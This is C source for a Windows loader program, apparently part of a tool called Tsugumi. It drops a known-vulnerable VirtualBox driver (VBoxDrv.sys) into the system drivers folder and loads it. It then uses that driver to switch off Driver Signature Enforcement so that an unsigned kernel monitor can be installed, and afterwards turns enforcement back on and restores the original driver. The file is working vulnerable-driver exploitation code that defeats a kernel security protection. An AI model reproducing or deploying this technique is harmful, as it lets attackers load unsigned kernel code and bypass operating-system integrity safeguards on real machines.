void UnloadVulnerableDriver(
VOID
)
{
SC_HANDLE schSCManager;
//
// If there is no VBox installed simple remove driver.
//
if (g_VBoxInstalled != TRUE) {
scmUnloadDeviceDriver(VBoxDrvSvc);
}
//
// VBox was installed, stop our and restore actual driver.
//
else {
//
// Stop our VBoxDrv service.
//
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager) {
scmStopDriver(schSCManager, VBoxDrvSvc);
CloseServiceHandle(schSCManager);
}
//
// Restore saved backup.
//
supBackupVBoxDrv(TRUE);
}
}
HANDLE LoadVulnerableDriver(
VOID
)
{
HANDLE hFile;
HANDLE hDevice;
DWORD bytesIO;
WCHAR szDriverBuffer[BUFFER_SIZE];
//
// Combine full path name for our driver.
//
RtlSecureZeroMemory(szDriverBuffer, BUFFER_SIZE);
if (!GetSystemDirectory(szDriverBuffer, MAX_PATH)) {
return NULL;
}
_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));
//
// Backup vboxdrv if exists.
//
g_VBoxInstalled = supBackupVBoxDrv(FALSE);
//
// Drop our driver file to the disk.
//
hFile = CreateFile(szDriverBuffer, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
return NULL;
}
bytesIO = 0;
WriteFile(hFile, VBoxDrv, sizeof(VBoxDrv), &bytesIO, NULL);
CloseHandle(hFile);
//
// Check if file dropped OK.
//
if (bytesIO != sizeof(VBoxDrv)) {
return NULL;
}
//
// Open device handle.
//
hDevice = NULL;
if (!scmLoadDeviceDriver(VBoxDrvSvc, szDriverBuffer, &hDevice)) {
return NULL;
}
//
// Driver file is no longer needed.
//
DeleteFile(szDriverBuffer);
return hDevice;
}
/*
* ldrMain
*
* Purpose:
*
* Program entry point.
*
*/
void ldrMain(
VOID
)
{
BOOL cond = FALSE;
LONG x;
ULONG l = 0, dwCmd;
HANDLE hDevice;
PVOID DataBuffer;
BOOL bConDisabled, bUsbMonDisabled;
WCHAR cmdLineParam[MAX_PATH + 1];
WCHAR szDriverBuffer[MAX_PATH * 2];
__security_init_cookie();
bConDisabled = FALSE;
bUsbMonDisabled = FALSE;
DataBuffer = NULL;
hDevice = NULL;
dwCmd = 0;
do {
//
// Check OS version.
//
RtlSecureZeroMemory(&g_osv, sizeof(g_osv));
g_osv.dwOSVersionInfoSize = sizeof(g_osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv);
//
// We support only Vista based OS.
//
if (g_osv.dwMajorVersion < 6) {
MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."),
T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Check number of instances running.
//
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
break;
}
//
// Check if any VBox instances are running, they must be closed before our usage.
//
if (supProcessExist(L"VirtualBox.exe")) {
MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."),
T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Query command line.
//
RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l);
if (l == 0) {
//
// Nothing in command line, simple display help and leave.
//
MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Check known command.
//
if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) {
dwCmd = TSMI_INSTALL;
}
else {
if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) {
dwCmd = TSMI_REMOVE;
}
}
if (dwCmd == 0) {
MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Init ldr and DSEFix.
//
if (!ldrInit(dwCmd)) {
break;
}
//
// Process command.
//
switch (dwCmd) {
case TSMI_INSTALL:
// Backup vboxdrv if exists.
supBackupVBoxDrv(FALSE);
// Stop VBox Networking and USB driver.
bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE)));
bUsbMonDisabled = dsfStopDriver(VBoxUsbMon);
dsfStopDriver(VBoxDrvSvc);
// Load vulnerable VBoxDrv, disable VBox Network if exist.
RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
if (GetSystemDirectory(szDriverBuffer, MAX_PATH) == 0) {
MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."),
NULL, MB_ICONINFORMATION);
break;
}
_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));
hDevice = dsfLoadVulnerableDriver(szDriverBuffer);
if (hDevice) {
//
// Disable DSE so we can load monitor.
// Device handle closed by DSEFix routine.
//
if (ldrPatchDSE(hDevice, TRUE)) {
// Stop our VBoxDrv, need reloading for 2nd usage.
dsfStopDriver(VBoxDrvSvc);
// Load custom patch table, if present.
RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l);
if (l > 0) {
l = 0;
DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l);
if ((DataBuffer != NULL) && (l > 0)) {
g_TsmiPatchDataValue = DataBuffer;
g_TsmiPatchDataValueSize = l;
}
}
// Install and run monitor.
if (!ldrSetMonitor()) {
MessageBox(GetDesktopWindow(),
TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR);
}
// Enable DSE back.
hDevice = NULL;
if (dsfStartDriver(VBoxDrvSvc, &hDevice)) {
ldrPatchDSE(hDevice, FALSE);
}
}
else { //ldrPatchDSE failure case
// Unknown error during DSE disabling attempt.
MessageBox(GetDesktopWindow(),
TEXT("Error disabling DSE"), NULL, MB_ICONERROR);
}
// Finally, remove our vboxdrv file and restore backup.
dsfStopDriver(VBoxDrvSvc);
DeleteFile(szDriverBuffer);
supBackupVBoxDrv(TRUE);
// Restart installed VBoxDrv.
dsfStartDriver(VBoxDrvSvc, NULL);
}
else { //dsfLoadVulnerableDriver failure case.
// Load error, show error message and restore backup.
supBackupVBoxDrv(TRUE);
MessageBox(GetDesktopWindow(),
TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR);
}
break;
//
// Remove command, unload our driver and purge file/memory list cache.
//
case TSMI_REMOVE:
scmUnloadDeviceDriver(TsmiDrvName);
supPurgeSystemCache();
break;
}
} while (cond);
//
// Cleanup after install.
//
if (dwCmd == TSMI_INSTALL) {
// Re-enable VBox Network, UsbMonitor if they're disabled.
if (bConDisabled) {
supNetworkConnectionEnable(VBoxNetConnect, TRUE);
}
if (bUsbMonDisabled) {
dsfStartDriver(VBoxUsbMon, NULL);
}
// Free memory allocated for custom patch table.
if (DataBuffer != NULL) {
HeapFree(GetProcessHeap(), 0, DataBuffer);
}
}
InterlockedDecrement((PLONG)&g_lApplicationInstances);
ExitProcess(0);
return;
}
